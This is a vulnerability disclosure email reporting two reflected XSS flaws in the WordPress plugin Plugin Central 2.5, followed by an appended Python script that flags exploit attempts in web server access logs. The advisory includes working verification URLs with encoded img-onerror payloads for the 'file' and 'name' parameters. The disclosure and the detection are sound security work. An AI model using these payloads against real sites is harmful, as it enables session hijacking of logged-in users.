Subject: Cross-Site Scripting (XSS) in Plugin Central 2.5
Date: Tue, 25 Aug 2015 13:35:05 +0200

Hello,

Plugin: Plugin Central 2.5 https://wordpress.org/plugins/plugin-central/

1. Reflected Cross-Site Scripting (XSS) 

Authenticated users (such as subscribers) can inject HTML/JS code (there is no CSRF protection).

Method: GET
URL: http://localhost/wp-admin/index.php?action=pc_delete&file=[xss]
Vulnerable parameters: file

Example PHP callstack:
PluginCentral::dash   [/plugin-central/plugin-central.class.php:192]
PluginCentral::delete_plugin   [/plugin-central/plugin-central.class.php:785]
PluginCentral::_flush   [/plugin-central/plugin-central.class.php:823]

Verification:
http://localhost/wp-admin/index.php?action=pc_delete&file=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E


2. Reflected Cross-Site Scripting (XSS) 

Authenticated users (such as subscribers) can inject HTML/JS code (there is no CSRF protection).

Method: GET
URL: http://localhost/wp-admin/index.php?action=pc_ignore&name=[xss]
Vulnerable parameters: name

Example PHP callstack:
PluginCentral::dash   [/plugin-central/plugin-central.class.php:213]

Verification:
http://localhost/wp-admin/index.php?action=pc_ignore&name=%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E


--
Regards,
Marcin Probola,
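
Added example, not part of the original advisory or the plugin's code: a log check that flags requests to the two reported actions (pc_delete/file and pc_ignore/name) whose decoded value contains markup characters. The combined access-log format, the sample lines, the 192.0.2.x addresses and the benign `file` value are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Action -> reflected parameter, exactly as listed in the advisory.
REFLECTED = {"pc_delete": "file", "pc_ignore": "name"}
# Characters needed to close an attribute or open a tag
# (assumption: never legitimate in these two parameters).
MARKUP = re.compile(r"[<>\"']")
# Request line inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def suspicious_value(target):
    """Return (action, param, decoded value) if the request target hits one
    of the two reported parameters with markup characters, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/wp-admin/index.php"):
        return None
    # parse_qs percent-decodes and turns '+' into a space, like PHP's $_GET.
    query = parse_qs(parts.query, keep_blank_values=True)
    for action in query.get("action", []):
        param = REFLECTED.get(action)
        if param is None:
            continue
        for value in query.get(param, []):
            if MARKUP.search(value):
                return action, param, value
    return None


def scan(lines):
    """Collect a hit for every log line whose request target is suspicious."""
    hits = []
    for line in lines:
        match = REQUEST.search(line)
        hit = suspicious_value(match.group(1)) if match else None
        if hit:
            hits.append(hit)
    return hits


# Constructed sample log; the two flagged targets are the advisory's verification URLs.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Aug/2015:13:40:01 +0200] "GET /wp-admin/index.php?action=pc_delete&file=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E HTTP/1.1" 200 5120',
    '192.0.2.11 - - [25/Aug/2015:13:41:12 +0200] "GET /wp-admin/index.php?action=pc_delete&file=hello-dolly/hello.php HTTP/1.1" 200 4980',
    '192.0.2.10 - - [25/Aug/2015:13:42:30 +0200] "GET /wp-admin/index.php?action=pc_ignore&name=%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E HTTP/1.1" 200 5011',
    '192.0.2.12 - - [25/Aug/2015:13:43:02 +0200] "GET /wp-admin/index.php HTTP/1.1" 200 4800',
]

if __name__ == "__main__":
    for action, param, value in scan(SAMPLE_LOG):
        print(f"action={action} {param}={value!r}")
```

Because the advisory notes there is no CSRF protection, a hit can come from a logged-in user who merely followed a link, so the client address on a flagged line identifies a possible victim session rather than necessarily the sender.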